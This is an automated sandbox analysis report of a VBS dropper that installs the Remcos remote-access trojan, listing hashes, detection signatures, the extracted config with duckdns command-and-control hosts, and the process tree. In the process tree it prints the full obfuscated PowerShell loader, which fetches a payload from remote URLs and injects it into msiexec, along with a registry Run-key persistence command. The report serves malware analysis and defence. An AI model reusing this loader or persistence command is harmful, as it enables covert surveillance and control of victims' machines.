Overview

overview

10

Static

static

1

06d4a6631c...22.vbs

windows7-x64

10

06d4a6631c...22.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    03-12-2024 02:03

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    06d4a6631cc392070dc01e7bc97e333bd61af14ecf60bfc492e2a585f56daa22.vbs

  • Size

    28KB

  • MD5

    3f1b162cde8a052e2743f254ad97c590

  • SHA1

    8263313c9ed96a36a57d67dfb72fa9729a2e792b

  • SHA256

    06d4a6631cc392070dc01e7bc97e333bd61af14ecf60bfc492e2a585f56daa22

  • SHA512

    447eb019fb70be017ad0fe0f1c88a467fd02ebac9647ac12a0dcd2ef8ddea223e6a3bf9e3c395d88839926638f6a0d8cce547bdf6a8a4b4349260c85c22e8416

  • SSDEEP

    384:M5cVCJUAGNvubdgdgrBRUmngkIgjpFsQF9Oq1ymBRhdzsxPc0+:M5cXLNvuby2LUmngzgjpimOq1dQxA

Score
10/10
remcosa$iandiscoverypersistencerat

Malware Config

Extracted

Family

remcos

Botnet

A$ian

C2

iwarsut775laudryed1.duckdns.org:57484

iwarsut775laudryed1.duckdns.org:57483

iwarsut775laudryed2.duckdns.org:57484

iwarsut775laudryed3.duckdns.org:57484
Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    hmbnspt.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    shibuetgtst-WMSLPY

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 4 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Network Service Discovery 1 TTPs 2 IoCs

    Attempt to gather information on host's network.

    discovery
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\06d4a6631cc392070dc01e7bc97e333bd61af14ecf60bfc492e2a585f56daa22.vbs"
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of WriteProcessMemory
    PID:2640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Upbuild='Termometrisk';;$Litteraer='ridtenes';;$Huggedes='Boghvedegrynet';;$Eliger='Idolastre';;$Warps=$host.Name;function Pickover($Receded){If ($Warps) {$Uddelegeringernes=5} for ($Stuearrester=$Uddelegeringernes;;$Stuearrester+=6){if(!$Receded[$Stuearrester]) { break };$melitas+=$Receded[$Stuearrester];$Fordum='Philatelists'}$melitas}function Semra($clamatory){ .($Tsningens229) ($clamatory)}$Karakterfastes=Pickover ' Sko.N tus EUdko,T.lzev.Bi lew';$Karakterfastes+=Pickover 'Sor iEShellBfeje CCyprilUnderi moneeInqu.n DasyT';$Legegades149=Pickover 'Etat MIronboIldrazverdeiUnl,clMemenlDemera orte/';$opgavesamlingens=Pickover 'RefleTGrainlunders Di l1Overs2';$Nonemphatic='Shedm[Cumarn itulEOpma.tBasid. TranSE hjoePaaterNur avcop aiUnmanC SelveFran,PAyudaO ,njeImartiNForret SpalmUnadma R neN Ove AElfmugSa meeFo,riRMu.ro] aars:Inqui:UddelS SyslESkid,CHaid.UEuropRNagaii VandTOpdraYPrevePCadweRHemopo Fa.kTSiphoO etacResulo F.rlLLands=Klima$Chec.OJazzbpUnfouGMallaADavidVStoreeLiqu SFjerdAAmb.sMHandlLbrobaiPouldn Ex eg,mbroeSub.eNLoss S';$Legegades149+=Pickover 'Kajpl5 P.ac.ant n0Erhve tr he( esoWoversiHok,un Forud ,ospoWienewOverfsKomm, UvuloN KalcTLdrep Spach1Unp e0Indta. Eiri0ha,rd;Thal EpaulW ForbiUnicanni,ku6 Timg4Alamo;Stili ActinxHypoc6 Thor4Nazar;Mouto SchmarunthwvExpat:trill1terpe3ur em1Spots.Optag0Ana r)Repre omiG Em ee A ktcSnapskH gumoH mme/Manic2P.odd0capp 1Reint0Gysel0Loxod1 Mana0Fossi1Mysti UdskeFlabyriBrudar UndueErektf sello efamxCockn/ Afsp1Jebat3Jeaab1k,ken.Klikk0';$Underklasse=Pickover ' ,ediUChurcST.aisE Tri R tr.l- abenaOle,ngexscuETmmern U lst';$Interassociate111=Pickover ' Sndeh Litet PynttErri p F.jlsResc.: Fdse/a ien/Rebu gGeninaTr,ubrInddeh rabaoLovovuIsengdMisopjAchenoUnscouUnfrarSilvemLaane.FandacAfreno forgmInti /surm KHldekeRedeby Tran1 Stor.GaspipJ,rrynprea,gGirin>TambuhOver.tplositHalshpForsisUnpar:Plura/Yvern/Flyveg TofraOplrirHldeshP rfuoEksp uSlgsudHe.erjInfluo KnapuKridtrBlaammKur uoSmertn EfteeRddel.Tak.dcFor,doSkrddmkenel/ DrifK eeshe Forlyme ap1Tsume.WitjapPedo nBaggrg';$Stred=Pickover ' Brnd>';$Tsningens229=Pickover 'OryssIMahzoEStrejX';$Kejsersnit235='Tragicly';$Pubbens='\Glacialtid.Ses';Semra (Pickover ' Stim$ GuesGDobbwlLe teOEl,ndBEdomia UnfrLUnben:Le svTPre tIElopelCultifO.dfoLCorsayuklogT,iplonDryssiGu dtnSmmo.gCostuEDdsdrrKerneS opde= Poli$P,side FormnCalumvIrrat:WangaaRetu,p,nkekpVul,aDHasseaSpeaktUdtola,ordv+bismu$ A buppopp UBedu bSubteBSpildECerylnHje ts');Semra (Pickover ' Elec$AdresGflyboLOmkomO MarrB RolaAMor ilAnt h:Hieroh DoppOParanmAnchooGavagnP,equUstrawcBefstL paedeWelteA micrrHeavy=Tr ke$OplgnIBimanN .ibet ummae Afsvr Varea N tisVi,ers ummeoVib aCUnquoI lectABoli.tNatalef.tes1Dingo1 anuk1 Cata. I dgsEmbarP SubdlIneliiPowniTMel n(Knoen$SagsaSskuretUdskrRNecroEBi.chDTrold)');Semra (Pickover $Nonemphatic);$Interassociate111=$Homonuclear[0];$ajlen=(Pickover 'Bi pe$BallaGTvineLMenn ODeltiBK okuA.mnitlDiplo:KleskRNonc ENesogKOs ilL vaasa lagtMBe rveBa.samDe okSOverrS Hic IGe,brg ntip1 Ddsb3Papis7vider=SynkrNOpe hECheekW,apan-SjaskoAandsbZonitJ tveEBlis,cNinictJordv NewfaS S eeyskovlSAlantTProbaESubstM.ljma.Certi$TinglKRede A co.nrHerboAAir hkSki stConusEKo.poRDiakrfOlit,asprinsPeripTProstechiffS');Semra ($ajlen);Semra (Pickover ' pol,$MutedRComprePuddekUnbrelSup aa A temBoghaeTehanm decksBentis Whe iFyri,gPrahu1 Meso3 L.mp7Terra.Maho,HReseceMetemaEncrid .obbeSyntar lassCe,eb[M tte$Bru tUKollanNons,dS.agse Be,vrJaquek akelStofpaSlutss ResesAutope Male]P.ehe=Ps ch$ TigeLUnp oeRel pgLaticeNatbogUdpinaMousedAur.se xocosOnoma1Antim4 ube9');$Consonantness=Pickover 'Misha$ HaanRDe,ome Res kBravel Par,aUndermBiproeResismcaus sBack s eedli OffigS rai1Doras3 Wa t7Udl n.HaglbD CarboDaggewSystenInkb lDambroSamk,aSlaugd ramFL.theiformulOv rseFe sk(Upass$Aflo.I skadnP ugutSp aeeBulldr eaca racs gudesSangsoC,mpicSval iPar.maPajamtfor veO.fic1,ngil1Pa ms1 Nonr,Spgel$HomeoSFirdoagtzplkAgramsTovr eDetrasHematp N geaPhlebrOverskBewite ,ilmtT les3Dagse4T lsv)';$Saksesparket34=$Tilflytningers;Semra (Pickover 'Un ns$ UdtaGFempelOutspOAdjudBBronzA,nstrl.itup: RelaPStroguFi.moRMeagevKonceE.lposyDesse=Potla(RenonTRedivENonmaSS lvstKaesk-Ge tip ,ockADecylt itwohHusbl Komme$u,eldsHj mlAProfekEn ersKen teRid.es StrepBim laEmaljRVowelkM lieEwe,nlTM ter3 defi4Ba,ta)');while (!$Purvey) {Semra (Pickover 'Pan l$nonp,gUnballMuld.o AfvrbcricoaSekunlKalci:oprinG.arageFo osnDdelinShilleIb remAutopl.ncatyEtym sNaturn uberi ChemnSkamfgUdkrae Pseun.insas Over= Re b$SkulpAC.nfefGreevtLaanevLineatHunchnPyramiTrumfnstyrvg KdebePhotor rekln.addee') ;Semra $Consonantness;Semra (Pickover 'ModulsEksisTTude a efutROutbrtSquir-Ro anSdinoplGnavpeduemoESubcepNr st Cov.4');Semra (Pickover 'Wigg $ EterGR synL BorgO P rlbBetr.ALymphLD.rze: AuguPSkjoluMi,ikRDiverVshi,teItineyFre m=Masse( tut t DiffE,axidS .nnettidde- juleP PoinA albot Ha rHSkole L el$Bygevs JubeAtitlekTurris MarsEB nziS alacp irgiaNellir S.uikMinuseVanddtPrate3unenj4Tandy)') ;Semra (Pickover ' gnin$ForklGOv,rel CommoUdmaabVdet.A rampl An p:E,pirbGryrkADopinACou tdGesjfEEpigoHIn eraOwsenVSurconVingeSparon=Frea $UnpergRemnflJo dsOSlam bKontraBeskrLMilio: KonvKbonnwuLyne nYer tsGastot omplMClinoA llusLreache GuerRFunktePremenAucheSPret,+ stic+ gamo%Smask$ Na lH U,grOjetmomT dspo SmitnGaudeU DelacSubcolCe leePredeA A,toR Inte.SleepcLykk,oAgterU St.nnPari.t') ;$Interassociate111=$Homonuclear[$Baadehavns]}$Onaner=289582;$Nedstreg=31752;Semra (Pickover 'Succe$UttergUnposlRegnsOMatteB NonsaPeturlLarge:DiuremmessiyBel sRForblIRat rC HypoaM,yers.ostb Athei=Trist T.rnigM nkseWil.ltproje-CroisCStudeO PastnplaniTSecsre omern HvesTAfslu Remin$remiss SkenaSwipeKBanegSAttenE OplysSkatePDisenAGrindRCyanuk DeflE Sak tSel k3zestf4');Semra (Pickover 'Co la$his og CabblCompaopathob OveraMidlal.ever:Hija IBrugemKalifmKun taHeternScenee ocianFi kec ElefeAnako1Dy ph3Arnab7,hara i.dis=Skrmt Slave[PuggaSRerumy T.ucsOveretGyneceReaktm Dipn. O,isCFox hoOdifenDejlivRi gkeFeltarItacit Tros]Dippe:Hemih: Cap F SocirT rryoforkym SyndBProscaDummesElekte abar6Renny4RecipSEffert.asrerartisi pisnapoqug Invo(.istr$OverbM s inyRoularDanneiAntiec BeniaA riesDelkr)');Semra (Pickover 'Anden$RanglgStranLSawhooQualiBBlaykaUnd.sLDefau:Pela TCyanirki,niFRefleNK.rociWishenWellhg,nflaEFjerpr LevnnNikkeETilpasPremu Unine=Vende Dicyc[Sk,ttSOscilY H peS S ovtScorieHal,bmComme.Tanket.nockESennex,emont.acho. DmtiEFermanE iasc EyedOSkrteDUfolkIUpstaNKostugSw nd]Blimp: akti:UngenAco.esSMilksCBedsoiGrav ID.eng. g utGM,sune IrlatLaxats,artnTorganRVedliI LserNF.agtg Spig(Salna$opslaIJa goMYd.rgMElendA CardNRimelEOverlNO ersC R spEBehan1Tilsy3Refin7Mikro)');Semra (Pickover 'Unad.$Led rGidri LAfs yO ontobPositAIro iLUdlad:MagerLAncese OutdVSk,lnIste ttUdloeyDever=Kterr$ Ele.tMa.herVeneyfDest NRhombI CandnMull GEdiyaeAtropRLilesN .hroEKvletsKomma.DynenSSowtbUCa,elb SpheS ,looTSpri.rNonaiIr kogNSammeGUnder(Efter$Nre dOBeskinBa kka FrasnLagopeFestrRUninf,Stjer$Ter anDischeGrnttD RumssAnettTcalycr untoEAf eaGKadmi)');Semra $Levity;"
      2⤵
      • Blocklisted process makes network request
      • Network Service Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2784
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Upbuild='Termometrisk';;$Litteraer='ridtenes';;$Huggedes='Boghvedegrynet';;$Eliger='Idolastre';;$Warps=$host.Name;function Pickover($Receded){If ($Warps) {$Uddelegeringernes=5} for ($Stuearrester=$Uddelegeringernes;;$Stuearrester+=6){if(!$Receded[$Stuearrester]) { break };$melitas+=$Receded[$Stuearrester];$Fordum='Philatelists'}$melitas}function Semra($clamatory){ .($Tsningens229) ($clamatory)}$Karakterfastes=Pickover ' Sko.N tus EUdko,T.lzev.Bi lew';$Karakterfastes+=Pickover 'Sor iEShellBfeje CCyprilUnderi moneeInqu.n DasyT';$Legegades149=Pickover 'Etat MIronboIldrazverdeiUnl,clMemenlDemera orte/';$opgavesamlingens=Pickover 'RefleTGrainlunders Di l1Overs2';$Nonemphatic='Shedm[Cumarn itulEOpma.tBasid. TranSE hjoePaaterNur avcop aiUnmanC SelveFran,PAyudaO ,njeImartiNForret SpalmUnadma R neN Ove AElfmugSa meeFo,riRMu.ro] aars:Inqui:UddelS SyslESkid,CHaid.UEuropRNagaii VandTOpdraYPrevePCadweRHemopo Fa.kTSiphoO etacResulo F.rlLLands=Klima$Chec.OJazzbpUnfouGMallaADavidVStoreeLiqu SFjerdAAmb.sMHandlLbrobaiPouldn Ex eg,mbroeSub.eNLoss S';$Legegades149+=Pickover 'Kajpl5 P.ac.ant n0Erhve tr he( esoWoversiHok,un Forud ,ospoWienewOverfsKomm, UvuloN KalcTLdrep Spach1Unp e0Indta. Eiri0ha,rd;Thal EpaulW ForbiUnicanni,ku6 Timg4Alamo;Stili ActinxHypoc6 Thor4Nazar;Mouto SchmarunthwvExpat:trill1terpe3ur em1Spots.Optag0Ana r)Repre omiG Em ee A ktcSnapskH gumoH mme/Manic2P.odd0capp 1Reint0Gysel0Loxod1 Mana0Fossi1Mysti UdskeFlabyriBrudar UndueErektf sello efamxCockn/ Afsp1Jebat3Jeaab1k,ken.Klikk0';$Underklasse=Pickover ' ,ediUChurcST.aisE Tri R tr.l- abenaOle,ngexscuETmmern U lst';$Interassociate111=Pickover ' Sndeh Litet PynttErri p F.jlsResc.: Fdse/a ien/Rebu gGeninaTr,ubrInddeh rabaoLovovuIsengdMisopjAchenoUnscouUnfrarSilvemLaane.FandacAfreno forgmInti /surm KHldekeRedeby Tran1 Stor.GaspipJ,rrynprea,gGirin>TambuhOver.tplositHalshpForsisUnpar:Plura/Yvern/Flyveg TofraOplrirHldeshP rfuoEksp uSlgsudHe.erjInfluo KnapuKridtrBlaammKur uoSmertn EfteeRddel.Tak.dcFor,doSkrddmkenel/ DrifK eeshe Forlyme ap1Tsume.WitjapPedo nBaggrg';$Stred=Pickover ' Brnd>';$Tsningens229=Pickover 'OryssIMahzoEStrejX';$Kejsersnit235='Tragicly';$Pubbens='\Glacialtid.Ses';Semra (Pickover ' Stim$ GuesGDobbwlLe teOEl,ndBEdomia UnfrLUnben:Le svTPre tIElopelCultifO.dfoLCorsayuklogT,iplonDryssiGu dtnSmmo.gCostuEDdsdrrKerneS opde= Poli$P,side FormnCalumvIrrat:WangaaRetu,p,nkekpVul,aDHasseaSpeaktUdtola,ordv+bismu$ A buppopp UBedu bSubteBSpildECerylnHje ts');Semra (Pickover ' Elec$AdresGflyboLOmkomO MarrB RolaAMor ilAnt h:Hieroh DoppOParanmAnchooGavagnP,equUstrawcBefstL paedeWelteA micrrHeavy=Tr ke$OplgnIBimanN .ibet ummae Afsvr Varea N tisVi,ers ummeoVib aCUnquoI lectABoli.tNatalef.tes1Dingo1 anuk1 Cata. I dgsEmbarP SubdlIneliiPowniTMel n(Knoen$SagsaSskuretUdskrRNecroEBi.chDTrold)');Semra (Pickover $Nonemphatic);$Interassociate111=$Homonuclear[0];$ajlen=(Pickover 'Bi pe$BallaGTvineLMenn ODeltiBK okuA.mnitlDiplo:KleskRNonc ENesogKOs ilL vaasa lagtMBe rveBa.samDe okSOverrS Hic IGe,brg ntip1 Ddsb3Papis7vider=SynkrNOpe hECheekW,apan-SjaskoAandsbZonitJ tveEBlis,cNinictJordv NewfaS S eeyskovlSAlantTProbaESubstM.ljma.Certi$TinglKRede A co.nrHerboAAir hkSki stConusEKo.poRDiakrfOlit,asprinsPeripTProstechiffS');Semra ($ajlen);Semra (Pickover ' pol,$MutedRComprePuddekUnbrelSup aa A temBoghaeTehanm decksBentis Whe iFyri,gPrahu1 Meso3 L.mp7Terra.Maho,HReseceMetemaEncrid .obbeSyntar lassCe,eb[M tte$Bru tUKollanNons,dS.agse Be,vrJaquek akelStofpaSlutss ResesAutope Male]P.ehe=Ps ch$ TigeLUnp oeRel pgLaticeNatbogUdpinaMousedAur.se xocosOnoma1Antim4 ube9');$Consonantness=Pickover 'Misha$ HaanRDe,ome Res kBravel Par,aUndermBiproeResismcaus sBack s eedli OffigS rai1Doras3 Wa t7Udl n.HaglbD CarboDaggewSystenInkb lDambroSamk,aSlaugd ramFL.theiformulOv rseFe sk(Upass$Aflo.I skadnP ugutSp aeeBulldr eaca racs gudesSangsoC,mpicSval iPar.maPajamtfor veO.fic1,ngil1Pa ms1 Nonr,Spgel$HomeoSFirdoagtzplkAgramsTovr eDetrasHematp N geaPhlebrOverskBewite ,ilmtT les3Dagse4T lsv)';$Saksesparket34=$Tilflytningers;Semra (Pickover 'Un ns$ UdtaGFempelOutspOAdjudBBronzA,nstrl.itup: RelaPStroguFi.moRMeagevKonceE.lposyDesse=Potla(RenonTRedivENonmaSS lvstKaesk-Ge tip ,ockADecylt itwohHusbl Komme$u,eldsHj mlAProfekEn ersKen teRid.es StrepBim laEmaljRVowelkM lieEwe,nlTM ter3 defi4Ba,ta)');while (!$Purvey) {Semra (Pickover 'Pan l$nonp,gUnballMuld.o AfvrbcricoaSekunlKalci:oprinG.arageFo osnDdelinShilleIb remAutopl.ncatyEtym sNaturn uberi ChemnSkamfgUdkrae Pseun.insas Over= Re b$SkulpAC.nfefGreevtLaanevLineatHunchnPyramiTrumfnstyrvg KdebePhotor rekln.addee') ;Semra $Consonantness;Semra (Pickover 'ModulsEksisTTude a efutROutbrtSquir-Ro anSdinoplGnavpeduemoESubcepNr st Cov.4');Semra (Pickover 'Wigg $ EterGR synL BorgO P rlbBetr.ALymphLD.rze: AuguPSkjoluMi,ikRDiverVshi,teItineyFre m=Masse( tut t DiffE,axidS .nnettidde- juleP PoinA albot Ha rHSkole L el$Bygevs JubeAtitlekTurris MarsEB nziS alacp irgiaNellir S.uikMinuseVanddtPrate3unenj4Tandy)') ;Semra (Pickover ' gnin$ForklGOv,rel CommoUdmaabVdet.A rampl An p:E,pirbGryrkADopinACou tdGesjfEEpigoHIn eraOwsenVSurconVingeSparon=Frea $UnpergRemnflJo dsOSlam bKontraBeskrLMilio: KonvKbonnwuLyne nYer tsGastot omplMClinoA llusLreache GuerRFunktePremenAucheSPret,+ stic+ gamo%Smask$ Na lH U,grOjetmomT dspo SmitnGaudeU DelacSubcolCe leePredeA A,toR Inte.SleepcLykk,oAgterU St.nnPari.t') ;$Interassociate111=$Homonuclear[$Baadehavns]}$Onaner=289582;$Nedstreg=31752;Semra (Pickover 'Succe$UttergUnposlRegnsOMatteB NonsaPeturlLarge:DiuremmessiyBel sRForblIRat rC HypoaM,yers.ostb Athei=Trist T.rnigM nkseWil.ltproje-CroisCStudeO PastnplaniTSecsre omern HvesTAfslu Remin$remiss SkenaSwipeKBanegSAttenE OplysSkatePDisenAGrindRCyanuk DeflE Sak tSel k3zestf4');Semra (Pickover 'Co la$his og CabblCompaopathob OveraMidlal.ever:Hija IBrugemKalifmKun taHeternScenee ocianFi kec ElefeAnako1Dy ph3Arnab7,hara i.dis=Skrmt Slave[PuggaSRerumy T.ucsOveretGyneceReaktm Dipn. O,isCFox hoOdifenDejlivRi gkeFeltarItacit Tros]Dippe:Hemih: Cap F SocirT rryoforkym SyndBProscaDummesElekte abar6Renny4RecipSEffert.asrerartisi pisnapoqug Invo(.istr$OverbM s inyRoularDanneiAntiec BeniaA riesDelkr)');Semra (Pickover 'Anden$RanglgStranLSawhooQualiBBlaykaUnd.sLDefau:Pela TCyanirki,niFRefleNK.rociWishenWellhg,nflaEFjerpr LevnnNikkeETilpasPremu Unine=Vende Dicyc[Sk,ttSOscilY H peS S ovtScorieHal,bmComme.Tanket.nockESennex,emont.acho. DmtiEFermanE iasc EyedOSkrteDUfolkIUpstaNKostugSw nd]Blimp: akti:UngenAco.esSMilksCBedsoiGrav ID.eng. g utGM,sune IrlatLaxats,artnTorganRVedliI LserNF.agtg Spig(Salna$opslaIJa goMYd.rgMElendA CardNRimelEOverlNO ersC R spEBehan1Tilsy3Refin7Mikro)');Semra (Pickover 'Unad.$Led rGidri LAfs yO ontobPositAIro iLUdlad:MagerLAncese OutdVSk,lnIste ttUdloeyDever=Kterr$ Ele.tMa.herVeneyfDest NRhombI CandnMull GEdiyaeAtropRLilesN .hroEKvletsKomma.DynenSSowtbUCa,elb SpheS ,looTSpri.rNonaiIr kogNSammeGUnder(Efter$Nre dOBeskinBa kka FrasnLagopeFestrRUninf,Stjer$Ter anDischeGrnttD RumssAnettTcalycr untoEAf eaGKadmi)');Semra $Levity;"
    1⤵
    • Network Service Discovery
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1396
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2752
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strudsmavers" /t REG_EXPAND_SZ /d "%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\Software\Firmity\').Isbjergets;%Barcelona% ($Nedtllingen)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2952
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strudsmavers" /t REG_EXPAND_SZ /d "%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\Software\Firmity\').Isbjergets;%Barcelona% ($Nedtllingen)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:1648

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    0dfedac243a74e7b840f4e8a40a29ab1

    SHA1

    aa222741162cdd876348a64f8144fb16ada06491

    SHA256

    049d22f183391b4faf032ff89b4a3adb07623a1d88d986e7e51490e6cc732f93

    SHA512

    ab2731cf53cef9d3283eae180918098a5330afdb5acaed5aa96759b34255c1379bd4820d56d5b9f5961de65448429da371bf9dd258425505f62d05ff880dab05

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab473F.tmp
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\TarB8C5.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Glacialtid.Ses
    Filesize

    418KB

    MD5

    4cf5ac6122fae42909350e40fbdeb8eb

    SHA1

    777ad8c6bf8912116ad6ab9575356146374c9b21

    SHA256

    4da60ce98680daa52f0d9404e304adc4c0508fa429dd133eeba0976b3dc8dc89

    SHA512

    3a3891a6b1a89ee776816c0bed2329d1cf16b63beb9c1e63790a79672e91b1f4a4b00799e75d9342d017ec2a0a7d21ddd5a378444f24b48f7d0d12f92a0c55f2

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5LQWPSY8YY2UC67TQ17H.temp
    Filesize

    7KB

    MD5

    26b410cdcea28b431342d607e97abeba

    SHA1

    977c8d8800e97486d1884264b7b85d13529d6b41

    SHA256

    ff673f28faefccf5965dccd6cd63006222fb7034e63630d87a067caaeacc6f25

    SHA512

    8c9acd1a95aa0f3522f9e83dc5b0e86e23422a1d0cfff41c5f70708be01f0a15ee51ce354b32b4522fff9c3fb360258773afbe3a5761c907379c995ebe4c5b20

    Download Submit

  • memory/1396-36-0x0000000006540000-0x000000000794C000-memory.dmp

    Filesize

    20.0MB

    Download

  • memory/2752-53-0x0000000000700000-0x0000000001762000-memory.dmp

    Filesize

    16.4MB

    Download

  • memory/2784-22-0x00000000023C0000-0x00000000023C8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2784-27-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-29-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-30-0x000007FEF575E000-0x000007FEF575F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2784-32-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-24-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-26-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-25-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-23-0x000007FEF54A0000-0x000007FEF5E3D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2784-21-0x000000001B660000-0x000000001B942000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2784-20-0x000007FEF575E000-0x000007FEF575F000-memory.dmp

    Filesize

    4KB

    Download